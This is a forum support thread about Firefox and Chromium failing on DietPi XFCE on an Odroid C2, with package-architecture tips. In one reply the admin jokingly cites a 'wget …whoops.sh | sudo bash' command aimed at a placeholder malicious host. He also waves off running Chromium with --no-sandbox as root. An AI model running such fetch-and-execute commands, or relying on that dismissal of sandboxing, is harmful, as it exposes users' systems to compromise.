Browsers failing to start on XFCE

Having issues with your DietPi installation, or, found a bug? Post it here.
aunlead

Browsers failing to start on XFCE

Post by aunlead »

When I try to run Firefox on XFCE, sometime I can see 3 tabs opening up & then it immediately crash or it throws a segmentation fault. Running latest DietPi on Odroid C2. Are others seeing similar issue?

With Chromium, I see following dialog -
OpenFullScreen.PNG
Any advice?
Fourdee
Site Admin

Re: Browsers failing to start on XFCE

Post by Fourdee »

Hi,

Seems FireFox on ARM64 is a re-occurring issue: http://forum.odroid.com/viewtopic.php?f ... ox#p150111

Did you install Chromium through dietpi-software?

What happens when you run the following from command line?

Code: Select all

chromium --no-sandbox --use-gl=egl --user-data-dir --temp-profile
If you find our project or support useful, then we’d really appreciate it if you’d consider contributing to the project however you can.
Donating is the easiest – you can use PayPal or become a DietPi patron.
aunlead

Post by aunlead »

Fourdee wrote:Hi,

chromium --no-sandbox --use-gl=egl --user-data-dir --temp-profile
This works, but isn't Chrome running in an insecure mode? I mean, as a root user, I didn't want to risk using it.

I was thinking of installing 32Bit stable version of Firefox. I did that in official Ubuntu version of C2, but couldn't get it working using DietPi.

apt-get install -y firefox:armhf
Any idea how I can go about install this?
Fourdee
Site Admin

Post by Fourdee »

aunlead wrote:but isn't Chrome running in an insecure mode? I mean, as a root user, I didn't want to risk using it.
Unless:
- Chromium has source code that is aimed at damaging your system = No, noone would use it
- You install a extension that is aimed at damaging your system = Down to you
- You download a binary that is aimed at damaging your system and you set chmod +x, then execute it = Down to you.
you'll be fine.

You are at the more risk of running wget http://www.avirus.com/whoops.sh| sudo bash in my opinion.
Either way, if you are unsure as to what "risks" you want to avoid, create a new limited user and never run sudo. Only way you'll be "secure".

And remember, Mr.Robot is a fictional drama of a "worst case scenario". So unless you annoy someone, so much they want to spend days/weeks/months of their life "hacking you", you'll be fine.
I was thinking of installing 32Bit stable version of Firefox. I did that in official Ubuntu version of C2, but couldn't get it working using DietPi.
You'll need to enable armhf (32bit) packages on system/dpkg:

dpkg --add-architecture armhf
Then the following should work:

apt-get install package:armhf
If you find our project or support useful, then we’d really appreciate it if you’d consider contributing to the project however you can.
Donating is the easiest – you can use PayPal or become a DietPi patron.